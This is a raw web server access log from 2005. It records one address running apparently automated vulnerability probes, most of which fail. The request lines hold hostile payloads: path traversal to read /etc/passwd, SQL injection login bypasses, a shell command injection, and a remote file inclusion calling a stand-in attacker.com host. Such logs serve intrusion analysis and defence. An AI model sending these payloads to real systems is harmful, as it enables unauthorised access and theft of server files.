"Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:00 +0100] "GET /examples/jsp/snp/snoop.jsp HTTP/1.0" 404 220 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:00 +0100] "GET /viewpage.php?file=/etc/passwd%20 HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:00 +0100] "GET /pathofzorum/index.php? HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:01 +0100] "GET /forum/index.php? HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:01 +0100] "GET /IISSamples/ExAir/search/advsearch.asp HTTP/1.0" 404 231 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:01 +0100] "GET /protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''=' HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:01 +0100] "GET /phpping/index.php? HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:01 +0100] "GET /perl/files.pl?file=sys:system/autoexec.ncf HTTP/1.0" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:01 +0100] "GET /filemanager/filemanager_forms.php? HTTP/1.0" 404 227 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:01 +0100] "GET /phprank/add.php? HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:01 +0100] "GET /downloads/pafiledb.php? HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:01 +0100] "GET forums/browse.php? HTTP/1.0" 400 273 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:01 +0100] "GET /phpwebfilemgr/index.php? HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:01 +0100] "GET /article.php? HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:01 +0100] "GET /catalog/inludes/include_once.php? HTTP/1.0" 404 226 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:01 +0100] "GET /globals.php3? HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:01 +0100] "GET /PJreview_Neo.cgi?p=/../../etc/services HTTP/1.0" 403 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:01 +0100] "GET /pm/lib.inc.php? HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:01 +0100] "GET /index.php?IDAdmin=test HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:02 +0100] "GET /nuke70/modules/MS_Analysis/title.php? HTTP/1.0" 404 230 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:02 +0100] "GET /modules/Your_Account/navbar.php%20 HTTP/1.0" 404 226 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:02 +0100] "GET /index.php?|=../../../../../../../../etc/passwd%20 HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:02 +0100] "GET /index.php?|=forum/view.php&topic=../../../../../../../etc/passwd HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:02 +0100] "GET /user.php?caselist[bad_file.txt][path]=http://localhost HTTP/1.0" 404 202 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:02 +0100] "GET /modules.php? HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:02 +0100] "GET /pforum/edituser.php HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:02 +0100] "GET /productcart/pc/Custva.asp? HTTP/1.0" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:02 +0100] "GET /productcart/database/EIPC.mdb HTTP/1.0" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:02 +0100] "GET /produccart/pdacmin/login.asp? HTTP/1.0" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:02 +0100] "GET /admin/inc_edit.asp?iLink=10%20 HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:02 +0100] "GET /ProductCart/pc/msg.asp? HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:02 +0100] "GET /pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4=bad%20 HTTP/1.0" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:02 +0100] "GET /owls/workshop/glossary.php? HTTP/1.0" 404 220 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:02 +0100] "GET /phpgedview/functions.php? HTTP/1.0" 404 218 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:03 +0100] "GET /pvote/ch_info.php?newpass=password&confirm=password%20 HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:03 +0100] "GET /livredor/index.php HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:03 +0100] "GET /index.php?pymembs=admin HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:03 +0100] "GET /pass_done.php? HTTP/1.0" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:03 +0100] "GET /showcat.php? HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:03 +0100] "GET /admin/fonctions/fctscr.php%20 HTTP/1.0" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:03 +0100] "GET /admin/admin.php? HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:03 +0100] "GET /customer/auth.php? HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:03 +0100] "GET /admin/upgrade.php? HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:03 +0100] "GET /cgi-bin/quikstore.cfg HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:03 +0100] "GET /servlet/SnoopServlet HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:03 +0100] "GET /support/download.jsp?filename=..%2F%20..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:03 +0100] "GET /cgi-bin/rxgoogle.cgi? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:03 +0100] "GET /s8forumfolder/users/any_name.php? HTTP/1.0" 404 226 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:03 +0100] "GET /scripts/wgate.dll? HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:03 +0100] "GET /scripts/wgate/pbw2/!? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:03 +0100] "GET /scripts/wgate/pbw2/!? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:03 +0100] "GET /cgi-bin/non-existent.pl HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:03 +0100] "GET /scozbook/view.php?PG=tes HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:03 +0100] "GET //admin/aindex.htm HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:03 +0100] "GET /cgi-bin/infosrch.cgi HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:03 +0100] "GET /genindexpage.cgi? HTTP/1.0" 403 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:03 +0100] "GET /staticpages/index.php? HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:03 +0100] "GET /chat/data/usr HTTP/1.0" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:04 +0100] "GET /simplebbs/users/users.php%20 HTTP/1.0" 404 220 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:04 +0100] "GET /eventcal2.php.php? HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:04 +0100] "GET /download.php?id=2% HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:04 +0100] "GET /cgi-bin/setup.pl? HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:04 +0100] "GET /cgi-bin/view-source HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:04 +0100] "GET /members.asp?%20 HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:04 +0100] "GET /cgi-bin/parse-file? HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:04 +0100] "GET /cgi-bin/admin/admin? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:04 +0100] "GET /modif/delete.php? HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:04 +0100] "GET /modules/Downloads/voteinclude.php%20 HTTP/1.0" 404 228 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:04 +0100] "GET /index.php?l=../../../../../../../../etc/passwd HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:04 +0100] "GET /index.php?l=forum/view.php&topic=../../../../../../../etc/passwd HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:04 +0100] "GET /viewCart.asp? HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:04 +0100] "GET /src/read_body.php? HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:05 +0100] "GET /src/read_body.php HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:05 +0100] "GET /data/fetch.php? HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:05 +0100] "GET /cgi-bin/sws/manager.pl? HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:05 +0100] "GET /admin/inc_links.asp%20 HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:05 +0100] "GET /cgi-bin/shop.plx/SID=313130332/page=;cat%20..;ls|%20 HTTP/1.0" 404 242 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:05 +0100] "GET /phpBB2/includes/db.php? HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:05 +0100] "GET /pvote/del.php?pollorder=1%20 HTTP/1.0" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:05 +0100] "GET /phpgedview/authentication_index.php? HTTP/1.0" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:05 +0100] "GET /admin/login.php? HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:05 +0100] "GET /cgi-bin/gettransbitmap HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:05 +0100] "GET /cgi-bin/.cobalt/sysManage/../admin/.htaccess HTTP/1.0" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:05 +0100] "GET /cgi-bin/.cobalt/message/message.cgi? HTTP/1.0" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:06 +0100] "GET /cgi-bin/.cobalt/alert/service.cgi? HTTP/1.0" 404 227 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:06 +0100] "GET /admin/cfg/configtache.inc.php%20 HTTP/1.0" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:06 +0100] "GET /cgi-bin/.cobalt/alert/service.cgi? HTTP/1.0" 404 227 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:06 +0100] "GET /cgi-bin/SGB_DIR/superguestconfig%20 HTTP/1.0" 404 227 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:06 +0100] "GET /cd-cgi/sscd_suncourier.pl HTTP/1.0" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:06 +0100] "GET /quikstore.cfg HTTP/1.0" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:06 +0100] "GET /site_searcher.cgi? HTTP/1.0" 403 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:06 +0100] "GET /cgi/surgeftpmgr.cgi? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:06 +0100] "GET /netget?sid=Safety&msg=2002&file=Safety HTTP/1.0" 404 200 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:06 +0100] "GET /sw000.asp? HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:06 +0100] "GET /cgi-bin/man.sh HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:06 +0100] "GET /cgi-bin/webplus.exe HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:06 +0100] "GET /cgi-bin/webplus.exe HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:06 +0100] "GET /images/?pattern=/*&sort=name HTTP/1.0" 404 201 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:06 +0100] "GET /debug/errorInfo? HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:06 +0100] "GET /technote/print.cgi HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:06 +0100] "GET /technote/main.cgi HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:06 +0100] "GET /page.php? HTTP/1.0" 404 202 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:06 +0100] "GET /gotopage.cgi? HTTP/1.0" 403 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:06 +0100] "GET /forum/viewtopic.php? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:06 +0100] "GET /scripts/texis.exe/phine HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:06 +0100] "GET /texis.exe/?-dump HTTP/1.0" 404 204 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:06 +0100] "GET /url.jsp? HTTP/1.0" 404 201 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:06 +0100] "GET /setpasswd.cgi HTTP/1.0" 403 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:07 +0100] "GET /admin/templates/header.php? HTTP/1.0" 404 220 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:07 +0100] "GET /ttforum/index.php? HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:07 +0100] "GET /tutos/file/file_new.php? HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:07 +0100] "GET /tutos/file/file_select.php? HTTP/1.0" 404 220 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:07 +0100] "GET /modif/ident.php? HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:07 +0100] "GET /typo3/typo3/dev/translations.php? HTTP/1.0" 404 226 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:07 +0100] "GET /board/index.php? HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:07 +0100] "GET /members/ID.xbb HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:07 +0100] "GET /phorum/viewtopic.php? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:07 +0100] "GET /Carts/Computers/viewCart.asp? HTTP/1.0" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:07 +0100] "GET /phorum/viewtopic.php? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:07 +0100] "GET /mail/src/read_body.php HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:07 +0100] "GET /upload.cgi%20 HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:07 +0100] "GET /auth.inc.php? HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:07 +0100] "GET /forum/memberlist.php? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:07 +0100] "GET /admin/inc_user_edit.asp?id=admin HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:07 +0100] "GET /forum/memberlist.php? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:08 +0100] "GET /forum/memberlist.php? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:08 +0100] "GET /forum/newreply.php? HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:08 +0100] "GET /VBZooM/add-subject.php? HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:08 +0100] "GET /owls/multiplechoice/resultsignore.php??filename=/etc/passwd HTTP/1.0" 404 231 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:08 +0100] "GET /pks/lookup? HTTP/1.0" 404 204 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:08 +0100] "GET /search97.vts HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:08 +0100] "GET /.cobalt/sysManage/../admin/.htaccess HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:08 +0100] "GET /vie/viewtopic.asp? HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:08 +0100] "GET /securelogin/1,2345,A,00.html? HTTP/1.0" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:08 +0100] "GET /gb/index.php?login=true%20 HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:08 +0100] "GET /vpasp/shopdisplayproducts.asp? HTTP/1.0" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:08 +0100] "GET /vpasp/shopdisplayproducts.asp? HTTP/1.0" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:08 +0100] "GET /mail/admin/../settings.html HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:08 +0100] "GET /allmylinks/include/info.inc.php? HTTP/1.0" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:08 +0100] "GET /dltclnt.php? HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:08 +0100] "GET /cgi-bin/vq/demos/respond.pl? HTTP/1.0" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:08 +0100] "GET /include/oci8.php?inc_dir=http://www.attacker.com&ext=txt%20 HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:08 +0100] "GET /cgi-bin/webpsvc.exe HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:08 +0100] "GET /cgi-bin/webpsvc.exe HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:08 +0100] "GET /chat_dir/register.php? HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:08 +0100] "GET /debug/showproc? HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:08 +0100] "GET /include/customize.php? HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:08 +0100] "GET /forum/admin/wwforum.mdb HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:08 +0100] "GET /post_message_form.asp? HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:08 +0100] "GET /news/news.mdb%20 HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:08 +0100] "GET /filemgmt/brokenfile.php? HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:09 +0100] "GET /cgi-bin/texis.exe/phine HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:09 +0100] "GET /texis.exe/?-version HTTP/1.0" 404 204 "-" 